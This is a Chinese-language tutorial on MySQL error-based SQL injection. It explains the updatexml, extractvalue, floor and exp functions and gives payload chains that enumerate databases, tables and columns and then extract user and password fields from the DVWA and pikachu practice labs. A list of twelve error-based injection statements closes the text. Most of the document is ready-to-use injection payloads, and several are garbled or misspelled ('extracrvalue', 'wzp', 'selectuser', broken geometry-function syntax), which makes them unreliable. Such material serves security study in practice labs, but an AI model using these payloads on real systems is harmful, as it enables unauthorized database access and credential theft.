sql注入之 报错注入函数 详解

1、前提条件：

报错注入的前提是当语句发生错误时，错误信息被输出到前端。

2、漏洞原因：

由于开发人员在开发程序时使用了print_r ()，mysql_error()，mysqli_connect_error()函数将mysql错误信息输出到前端，因此可以通过闭合原先的语句，去执行后面的语句。

3、常用报错函数：

updatexml()         是mysql对xml文档数据进行查询和修改的xpath函数
extractvalue()      是mysql对xml文档数据进行查询的xpath函数
floor()             mysql中用来取整的函数
exp()               此函数返回e(自然对数的底)指数x的幂值

3.1 updatexml()函数：

作用是改变（查找并替换）xml文档中符合条件的节点的值。

updatexml(xml_document,xpthstring,new_value)

第一个参数是字符串string(xml文档对象的名称)

第二个参数是指定字符串中的一个位置（xpath格式的字符串）

第三个参数是将要替换成什么，string格式

xpath定位必须是有效的，否则则会发生错误。我们就能利用这个特性爆出我们想要的数据

payload：

?id=1' or updatexml(0,concat(0x7e,select database()),1)'

后端sql语句拼接：

insert into user(name,password,sex,phone,address1,address2) value('' or updatexml(1,concat(0x7e,database()),1) or '',

 利用过程：

1'and updatexml(1,concat(0x7e,database(),0x7e,user(),0x7e,@@datadir),1)#    ---库名
1'and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database()),0x7e),1) #    ---表名
1'and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema='dvwa' and table_name='users'),0x7e),1) #    ---列名
1' and updatexml(1,concat(0x7e,(select group_concat(first_name,0x7e,last_name) from dvwa.users)),1) #    ---字段值

3.2 extractvalue()函数：

作用是从目标xml中返回包含所查询值的字符串

extractvalue (xml_document, xpath_string);

第一个参数：xml_document是string格式，为xml文档对象的名称，文中为doc

第二个参数：xpath_string(xpath格式的字符串)，xpath定位必须是有效的，否则会发生错误

构造payload：

?id=1' or extracrvalue(0,concat(0x7e,database())) or '

注意xpath回显只有一位使用limit函数逐个爆，且最长为32位，超过32位爆不了

利用过程：（库-表-列-字段）

1' and extractvalue(1,concat(0x7e,user(),0x7e,database())) #
1' and extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database()))) #
1' and extractvalue(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='users'))) #
1' and extractvalue(1,concat(0x7e,(select group_concat(user_id,0x7e,first_name,0x3a,last_name) from dvwa.users))) #

3.3 floor()函数：

向下取整函数。

利用过程：（库-表-列-字段）

表名（库为dvwa，通过修改 limit 0,1值递增查表， limit 1,1、limit 2,1）

id=1' union select count(*),concat(floor(rand(0)*2),database()) x from information_schema.schemata group by x #
id=1' union select count(*),concat(floor(rand(0)*2),0x3a,(select concat(table_name) from information_schema.tables where table_schema='dvwa' limit 0,1)) x from information_schema.schemata group by x#
id=1' union select count(*),concat(floor(rand(0)*2),0x3a,(select concat(column_name) from information_schema.columns where table_name='users' and table_schema='dvwa' limit 0,1)) x from information_schema.schemata group by x#
id=1' union select count(*),concat(floor(rand(0)*2),0x3a,(select concat(user,0x3a,password) from dvwa.users limit 0,1)) x from information_schema.schemata group by x#

3.4 exp()函数：

当传递一个大于709的值时，函数exp()就会引起一个溢出错误。

利用过程：（库-表-列-字段）

id=1' or exp(~(select * from(select database())a)) or '
id=1' or exp(~(select * from(select group_concat(table_name) from information_schema.tables where table_schema = 'pikachu')a)) or '
id=1' or exp(~(select * from(select group_concat(column_name) from information_schema.columns where table_name = 'users')a)) or '
id=1' or wzp(~(select * from(select password from users limit 0,1)a)) or '

4、12种报错注入函数：

1、通过floor报错,注入语句如下:
and (select 1 from (select count(*),concat(user(),floor(rand(0)*2))x from information_schema.tables group by x)a);
2、通过extractvalue报错,注入语句如下:
and (extractvalue(1,concat(0x7e,(select user()),0x7e)));
3、通过updatexml报错,注入语句如下:
and (updatexml(1,concat(0x7e,(select user()),0x7e),1));
4、通过exp报错,注入语句如下:
and exp(~(select * from (select user () ) a) );
5、通过join报错,注入语句如下:
select * from(select * from mysql.user ajoin mysql.user b)c;
6、通过name_const报错,注入语句如下:
and exists(selectfrom (selectfrom(selectname_const(@@version,0))a join (select name_const(@@version,0))b)c);
7、通过geometrycollection()报错,注入语句如下:
and geometrycollection(()select *from(select user () )a)b );
8、通过polygon ()报错,注入语句如下:
and polygon (()select * from(select user ())a)b );
9、通过multipoint ()报错,注入语句如下:
and multipoint (()select * from(select user() )a)b );
10、通过multlinestring ()报错,注入语句如下:
and multlinestring (()select * from(selectuser () )a)b );
11、通过multpolygon ()报错,注入语句如下:
and multpolygon (()select * from(selectuser () )a)b );
12、通过linestring ()报错,注入语句如下:
and linestring (()select * from(select user() )a)b );